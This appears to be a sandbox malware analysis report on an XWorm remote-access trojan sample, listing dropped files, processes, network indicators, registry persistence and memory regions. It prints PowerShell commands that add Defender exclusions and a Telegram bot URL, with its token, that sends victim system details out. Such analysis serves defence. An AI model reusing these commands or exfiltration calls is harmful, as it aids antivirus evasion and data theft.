Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
9RgE5uOJwX.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\MicrosoftClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftClient.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1200f3fr.umw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m4ooqvu.rkx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c22fplgp.ftk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evg5ljc0.lbp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqehw504.zrr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1ap1a4r.nhh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jehizhgh.tgs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfmc1crw.fnu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbx5p13a.aei.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odk4swbj.ptx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t34fekhc.utb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpjrcxtd.zeq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_varukukj.bly.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs4qdwzl.de4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv3n0vpr.wqm.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 10 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\9RgE5uOJwX.exe
|
"C:\Users\user\Desktop\9RgE5uOJwX.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
|
||
C:\Users\user\AppData\Local\MicrosoftClient.exe
|
"C:\Users\user\AppData\Local\MicrosoftClient.exe"
|
||
C:\Users\user\AppData\Local\MicrosoftClient.exe
|
"C:\Users\user\AppData\Local\MicrosoftClient.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
vehicle-temp.gl.at.ply.gg
|
|||
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
|
149.154.167.220
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.microsoft.coiops
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.micft.cMicRosof
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
vehicle-temp.gl.at.ply.gg
|
147.185.221.23
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
147.185.221.23
|
vehicle-temp.gl.at.ply.gg
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
MicrosoftClient
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
13028000
|
trusted library allocation
|
page read and write
|
||
CF2000
|
unkown
|
page readonly
|
||
CC66C7E000
|
stack
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page execute and read and write
|
||
2A707F10000
|
trusted library allocation
|
page read and write
|
||
76F4EFA000
|
stack
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
200F031C000
|
heap
|
page read and write
|
||
117F000
|
heap
|
page read and write
|
||
20080D85000
|
trusted library allocation
|
page read and write
|
||
7DF4A74F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD342F0000
|
trusted library allocation
|
page read and write
|
||
2A707F21000
|
trusted library allocation
|
page read and write
|
||
200F0540000
|
heap
|
page readonly
|
||
2A708371000
|
trusted library allocation
|
page read and write
|
||
2A71F4AE000
|
heap
|
page read and write
|
||
200F05C0000
|
trusted library allocation
|
page read and write
|
||
18679F7B000
|
heap
|
page read and write
|
||
7FFD342CB000
|
trusted library allocation
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
CC66E7D000
|
stack
|
page read and write
|
||
18677D6D000
|
heap
|
page read and write
|
||
CC669EE000
|
stack
|
page read and write
|
||
20080C03000
|
trusted library allocation
|
page read and write
|
||
12E41000
|
trusted library allocation
|
page read and write
|
||
18600229000
|
trusted library allocation
|
page read and write
|
||
2A71F8A6000
|
heap
|
page read and write
|
||
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
2A70537B000
|
heap
|
page read and write
|
||
200812A9000
|
trusted library allocation
|
page read and write
|
||
7FFD3470D000
|
trusted library allocation
|
page read and write
|
||
1D06E000
|
stack
|
page read and write
|
||
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
20090071000
|
trusted library allocation
|
page read and write
|
||
18601E00000
|
trusted library allocation
|
page read and write
|
||
1C6BD000
|
stack
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
76F4CF8000
|
stack
|
page read and write
|
||
7FFD34380000
|
trusted library allocation
|
page execute and read and write
|
||
186013C5000
|
trusted library allocation
|
page read and write
|
||
2A71F8E1000
|
heap
|
page read and write
|
||
1350000
|
heap
|
page read and write
|
||
CC66FF9000
|
stack
|
page read and write
|
||
456B8E000
|
stack
|
page read and write
|
||
7FFD3431C000
|
trusted library allocation
|
page execute and read and write
|
||
23A1A0C6000
|
heap
|
page read and write
|
||
20081784000
|
trusted library allocation
|
page read and write
|
||
18600D7D000
|
trusted library allocation
|
page read and write
|
||
2A706DE0000
|
heap
|
page read and write
|
||
7FFD34480000
|
trusted library allocation
|
page execute and read and write
|
||
18677D75000
|
heap
|
page read and write
|
||
23A00181000
|
heap
|
page read and write
|
||
20090001000
|
trusted library allocation
|
page read and write
|
||
20080BFB000
|
trusted library allocation
|
page read and write
|
||
2A7071DA000
|
trusted library allocation
|
page read and write
|
||
2A708819000
|
trusted library allocation
|
page read and write
|
||
1867A1F2000
|
heap
|
page read and write
|
||
7FFD34400000
|
trusted library allocation
|
page execute and read and write
|
||
23A1A11D000
|
heap
|
page read and write
|
||
18677D43000
|
heap
|
page read and write
|
||
1C27B000
|
stack
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
200F2777000
|
heap
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
D02000
|
unkown
|
page readonly
|
||
200F1E90000
|
heap
|
page execute and read and write
|
||
AC79D4D000
|
stack
|
page read and write
|
||
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
CC67C4E000
|
stack
|
page read and write
|
||
7FFD34498000
|
trusted library allocation
|
page read and write
|
||
2A71F790000
|
heap
|
page read and write
|
||
1867A0BF000
|
heap
|
page read and write
|
||
2A71F925000
|
heap
|
page read and write
|
||
1867A1EF000
|
heap
|
page read and write
|
||
2A7172A9000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34376000
|
trusted library allocation
|
page read and write
|
||
7FFD34639000
|
trusted library allocation
|
page read and write
|
||
200F2327000
|
heap
|
page read and write
|
||
200F2385000
|
heap
|
page read and write
|
||
1BF7E000
|
stack
|
page read and write
|
||
18679EB8000
|
heap
|
page read and write
|
||
2A708901000
|
trusted library allocation
|
page read and write
|
||
1330000
|
trusted library allocation
|
page read and write
|
||
23A1A090000
|
heap
|
page read and write
|
||
7FFD342B4000
|
trusted library allocation
|
page read and write
|
||
200902EA000
|
trusted library allocation
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
2A71F7EC000
|
heap
|
page read and write
|
||
1BC0E000
|
stack
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
200813C5000
|
trusted library allocation
|
page read and write
|
||
76F4F7F000
|
stack
|
page read and write
|
||
456B0C000
|
stack
|
page read and write
|
||
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
200902F7000
|
trusted library allocation
|
page read and write
|
||
1B97F000
|
stack
|
page read and write
|
||
11FC000
|
heap
|
page read and write
|
||
18601782000
|
trusted library allocation
|
page read and write
|
||
7DF401EF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
7FFD342DB000
|
trusted library allocation
|
page read and write
|
||
18600BFB000
|
trusted library allocation
|
page read and write
|
||
200F27B3000
|
heap
|
page read and write
|
||
1867A19E000
|
heap
|
page read and write
|
||
2A70806B000
|
trusted library allocation
|
page read and write
|
||
186799F0000
|
trusted library allocation
|
page read and write
|
||
23A0016C000
|
heap
|
page read and write
|
||
AC789DE000
|
stack
|
page read and write
|
||
2A717021000
|
trusted library allocation
|
page read and write
|
||
7FFD343C6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
18679FB3000
|
heap
|
page read and write
|
||
2E51000
|
trusted library allocation
|
page read and write
|
||
23A1A0E7000
|
heap
|
page read and write
|
||
7FFD342C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34450000
|
trusted library allocation
|
page read and write
|
||
18677D6A000
|
heap
|
page read and write
|
||
18679E80000
|
heap
|
page read and write
|
||
20080A52000
|
trusted library allocation
|
page read and write
|
||
2A7172A1000
|
trusted library allocation
|
page read and write
|
||
20080001000
|
trusted library allocation
|
page read and write
|
||
23A1A0E5000
|
heap
|
page read and write
|
||
200F0615000
|
heap
|
page read and write
|
||
E60000
|
trusted library allocation
|
page read and write
|
||
1CA70000
|
heap
|
page read and write
|
||
2A705305000
|
heap
|
page read and write
|
||
7FFD3461C000
|
trusted library allocation
|
page read and write
|
||
2A71F91E000
|
heap
|
page read and write
|
||
2A71F92A000
|
heap
|
page read and write
|
||
E55000
|
heap
|
page read and write
|
||
7FFD342E4000
|
trusted library allocation
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
20080E92000
|
trusted library allocation
|
page read and write
|
||
23A1A4FD000
|
heap
|
page read and write
|
||
1166000
|
heap
|
page read and write
|
||
CC66D7E000
|
stack
|
page read and write
|
||
CC67D4C000
|
stack
|
page read and write
|
||
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
2E93000
|
heap
|
page read and write
|
||
23A00120000
|
heap
|
page read and write
|
||
A00000
|
unkown
|
page readonly
|
||
23A0017E000
|
heap
|
page read and write
|
||
200902F1000
|
trusted library allocation
|
page read and write
|
||
200F0577000
|
heap
|
page execute and read and write
|
||
7FFD3436C000
|
trusted library allocation
|
page execute and read and write
|
||
76F48FE000
|
stack
|
page read and write
|
||
186798D0000
|
heap
|
page read and write
|
||
7FFD34604000
|
trusted library allocation
|
page read and write
|
||
1BADD000
|
stack
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
18601867000
|
trusted library allocation
|
page read and write
|
||
200F0610000
|
heap
|
page read and write
|
||
23A02D9D000
|
trusted library allocation
|
page read and write
|
||
18610241000
|
trusted library allocation
|
page read and write
|
||
18610031000
|
trusted library allocation
|
page read and write
|
||
7FFD34461000
|
trusted library allocation
|
page read and write
|
||
186018F0000
|
trusted library allocation
|
page read and write
|
||
23A1A360000
|
heap
|
page read and write
|
||
2A716FE1000
|
trusted library allocation
|
page read and write
|
||
2A706D10000
|
trusted library allocation
|
page read and write
|
||
7FFD34613000
|
trusted library allocation
|
page read and write
|
||
2A708DB3000
|
trusted library allocation
|
page read and write
|
||
2A71F5D5000
|
heap
|
page read and write
|
||
2A705300000
|
heap
|
page read and write
|
||
7FFD342D4000
|
trusted library allocation
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
7FFD342C3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
18679FD7000
|
heap
|
page read and write
|
||
20080FC3000
|
trusted library allocation
|
page read and write
|
||
18679E76000
|
heap
|
page execute and read and write
|
||
7FFD342CD000
|
trusted library allocation
|
page execute and read and write
|
||
18679FB0000
|
heap
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
7FFD342B0000
|
trusted library allocation
|
page read and write
|
||
1C008000
|
heap
|
page read and write
|
||
20080F78000
|
trusted library allocation
|
page read and write
|
||
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
1B77E000
|
stack
|
page read and write
|
||
7FFD3462C000
|
trusted library allocation
|
page read and write
|
||
7FFD342D0000
|
trusted library allocation
|
page read and write
|
||
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
2A71F509000
|
heap
|
page read and write
|
||
2A706EA0000
|
heap
|
page read and write
|
||
1BBDE000
|
stack
|
page read and write
|
||
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
1B9B0000
|
heap
|
page read and write
|
||
18600C07000
|
trusted library allocation
|
page read and write
|
||
CC67CCC000
|
stack
|
page read and write
|
||
23A01C41000
|
trusted library allocation
|
page read and write
|
||
F1F000
|
heap
|
page read and write
|
||
2A71F90E000
|
heap
|
page read and write
|
||
23A1A0D8000
|
heap
|
page read and write
|
||
23A02C0D000
|
trusted library allocation
|
page read and write
|
||
7FFD342E3000
|
trusted library allocation
|
page execute and read and write
|
||
EFE000
|
heap
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
23A01E68000
|
trusted library allocation
|
page read and write
|
||
23A11F39000
|
trusted library allocation
|
page read and write
|
||
18610308000
|
trusted library allocation
|
page read and write
|
||
E80000
|
trusted library allocation
|
page read and write
|
||
23A004B0000
|
trusted library allocation
|
page read and write
|
||
1CA5F000
|
stack
|
page read and write
|
||
12E48000
|
trusted library allocation
|
page read and write
|
||
200F033D000
|
heap
|
page read and write
|
||
23A01C3A000
|
heap
|
page read and write
|
||
7FFD342C3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
1867A1A4000
|
heap
|
page read and write
|
||
200F2660000
|
heap
|
page read and write
|
||
200F0550000
|
heap
|
page read and write
|
||
7FFD34390000
|
trusted library allocation
|
page read and write
|
||
200F2460000
|
heap
|
page read and write
|
||
7FFD3447A000
|
trusted library allocation
|
page read and write
|
||
2A70542C000
|
heap
|
page read and write
|
||
23A11C71000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
2A7053C7000
|
heap
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
7FFD344C4000
|
trusted library allocation
|
page read and write
|
||
200F0321000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
1867A150000
|
heap
|
page read and write
|
||
20080F6B000
|
trusted library allocation
|
page read and write
|
||
186010F2000
|
trusted library allocation
|
page read and write
|
||
2BD1000
|
trusted library allocation
|
page read and write
|
||
2A71F5D0000
|
heap
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
455A77000
|
stack
|
page read and write
|
||
200F0364000
|
heap
|
page read and write
|
||
2A71F89E000
|
heap
|
page read and write
|
||
2008186A000
|
trusted library allocation
|
page read and write
|
||
200F27A5000
|
heap
|
page read and write
|
||
2A71F5A6000
|
heap
|
page execute and read and write
|
||
186012A9000
|
trusted library allocation
|
page read and write
|
||
45587E000
|
stack
|
page read and write
|
||
23A02D62000
|
trusted library allocation
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
7FFD342B0000
|
trusted library allocation
|
page read and write
|
||
23A11C41000
|
trusted library allocation
|
page read and write
|
||
1867A1DA000
|
heap
|
page read and write
|
||
23A1A44D000
|
heap
|
page read and write
|
||
20090021000
|
trusted library allocation
|
page read and write
|
||
18679FA0000
|
heap
|
page read and write
|
||
76F5AC7000
|
stack
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
2A708185000
|
trusted library allocation
|
page read and write
|
||
7FFD344A8000
|
trusted library allocation
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page read and write
|
||
200F04D0000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
20081890000
|
trusted library allocation
|
page read and write
|
||
20081E23000
|
trusted library allocation
|
page read and write
|
||
18677D8D000
|
heap
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
132E000
|
stack
|
page read and write
|
||
7FFD342D0000
|
trusted library allocation
|
page read and write
|
||
200F273D000
|
heap
|
page read and write
|
||
7FFD34716000
|
trusted library allocation
|
page read and write
|
||
200F2670000
|
heap
|
page read and write
|
||
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
18677D79000
|
heap
|
page read and write
|
||
2A71F911000
|
heap
|
page read and write
|
||
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
23A1A5F0000
|
heap
|
page read and write
|
||
23A00128000
|
heap
|
page read and write
|
||
18600087000
|
trusted library allocation
|
page read and write
|
||
117C000
|
heap
|
page read and write
|
||
7FFD34470000
|
trusted library allocation
|
page execute and read and write
|
||
200818F3000
|
trusted library allocation
|
page read and write
|
||
7FFD342BD000
|
trusted library allocation
|
page execute and read and write
|
||
23A1A3BF000
|
heap
|
page read and write
|
||
18679F3B000
|
heap
|
page read and write
|
||
23A001A5000
|
heap
|
page read and write
|
||
3010000
|
heap
|
page read and write
|
||
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
AC79F4E000
|
stack
|
page read and write
|
||
76F5BCE000
|
stack
|
page read and write
|
||
23A01B70000
|
trusted library allocation
|
page read and write
|
||
18601E25000
|
trusted library allocation
|
page read and write
|
||
2A71F5A0000
|
heap
|
page execute and read and write
|
||
1234000
|
heap
|
page read and write
|
||
186010BF000
|
trusted library allocation
|
page read and write
|
||
23A1A0D6000
|
heap
|
page read and write
|
||
200F2590000
|
trusted library allocation
|
page read and write
|
||
23A02CFE000
|
trusted library allocation
|
page read and write
|
||
23A03A64000
|
trusted library allocation
|
page read and write
|
||
23A000B0000
|
heap
|
page read and write
|
||
2A708734000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
23A001A7000
|
heap
|
page read and write
|
||
2A706D30000
|
trusted library allocation
|
page read and write
|
||
13021000
|
trusted library allocation
|
page read and write
|
||
455C37000
|
stack
|
page read and write
|
||
7FF48F9B0000
|
trusted library allocation
|
page execute and read and write
|
||
200F02A0000
|
heap
|
page read and write
|
||
23A1A296000
|
heap
|
page read and write
|
||
200F0325000
|
heap
|
page read and write
|
||
455E3F000
|
stack
|
page read and write
|
||
AC792FC000
|
stack
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
2A706F50000
|
trusted library allocation
|
page read and write
|
||
CC66EF6000
|
stack
|
page read and write
|
||
76F59CE000
|
stack
|
page read and write
|
||
20081214000
|
trusted library allocation
|
page read and write
|
||
200F0555000
|
heap
|
page read and write
|
||
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
2A705387000
|
heap
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
186102EE000
|
trusted library allocation
|
page read and write
|
||
7FFD34366000
|
trusted library allocation
|
page read and write
|
||
1453000
|
trusted library allocation
|
page read and write
|
||
7FFD344C8000
|
trusted library allocation
|
page read and write
|
||
7FFD3430C000
|
trusted library allocation
|
page execute and read and write
|
||
AC78FF7000
|
stack
|
page read and write
|
||
2A71F8D1000
|
heap
|
page read and write
|
||
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
18677F20000
|
trusted library section
|
page read and write
|
||
23A01B50000
|
heap
|
page execute and read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
23A1A27B000
|
heap
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
1BA0E000
|
stack
|
page read and write
|
||
23A1A4B8000
|
heap
|
page read and write
|
||
200F0368000
|
heap
|
page read and write
|
||
23A03A3F000
|
trusted library allocation
|
page read and write
|
||
7FFD3449A000
|
trusted library allocation
|
page read and write
|
||
CC67DCC000
|
stack
|
page read and write
|
||
7FFD342DD000
|
trusted library allocation
|
page execute and read and write
|
||
AC7927E000
|
stack
|
page read and write
|
||
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
2A71F7A0000
|
heap
|
page read and write
|
||
23A1A3BB000
|
heap
|
page read and write
|
||
200F0290000
|
heap
|
page read and write
|
||
1120000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page execute and read and write
|
||
200F2540000
|
heap
|
page execute and read and write
|
||
23A11CB2000
|
trusted library allocation
|
page read and write
|
||
23A034A5000
|
trusted library allocation
|
page read and write
|
||
23A034CC000
|
trusted library allocation
|
page read and write
|
||
7FFD342E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
23A02F7C000
|
trusted library allocation
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
7FFD34370000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
186102F0000
|
trusted library allocation
|
page read and write
|
||
23A11F2B000
|
trusted library allocation
|
page read and write
|
||
23A00080000
|
heap
|
page read and write
|
||
23A1A4BA000
|
heap
|
page read and write
|
||
23A02C46000
|
trusted library allocation
|
page read and write
|
||
2E41000
|
trusted library allocation
|
page read and write
|
||
20090309000
|
trusted library allocation
|
page read and write
|
||
4558FE000
|
stack
|
page read and write
|
||
2A706EA5000
|
heap
|
page read and write
|
||
1170000
|
heap
|
page execute and read and write
|
||
7FFD342B3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34648000
|
trusted library allocation
|
page read and write
|
||
186004CE000
|
trusted library allocation
|
page read and write
|
||
AC78EFE000
|
stack
|
page read and write
|
||
12AF000
|
heap
|
page read and write
|
||
1D074000
|
heap
|
page read and write
|
||
2A71F7AE000
|
heap
|
page read and write
|
||
EC5000
|
heap
|
page read and write
|
||
23A00144000
|
heap
|
page read and write
|
||
4555EE000
|
stack
|
page read and write
|
||
12BD3000
|
trusted library allocation
|
page read and write
|
||
2A717358000
|
trusted library allocation
|
page read and write
|
||
2A708D8E000
|
trusted library allocation
|
page read and write
|
||
23A004C0000
|
heap
|
page read and write
|
||
2A706DA0000
|
trusted library allocation
|
page read and write
|
||
7DF4C8090000
|
trusted library allocation
|
page execute and read and write
|
||
10F4000
|
stack
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
23A033C0000
|
trusted library allocation
|
page read and write
|
||
18679FBE000
|
heap
|
page read and write
|
||
2A71F410000
|
heap
|
page read and write
|
||
12BD1000
|
trusted library allocation
|
page read and write
|
||
125F000
|
heap
|
page read and write
|
||
7FFD342DD000
|
trusted library allocation
|
page execute and read and write
|
||
76F4D79000
|
stack
|
page read and write
|
||
7FFD343D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD3431C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34366000
|
trusted library allocation
|
page read and write
|
||
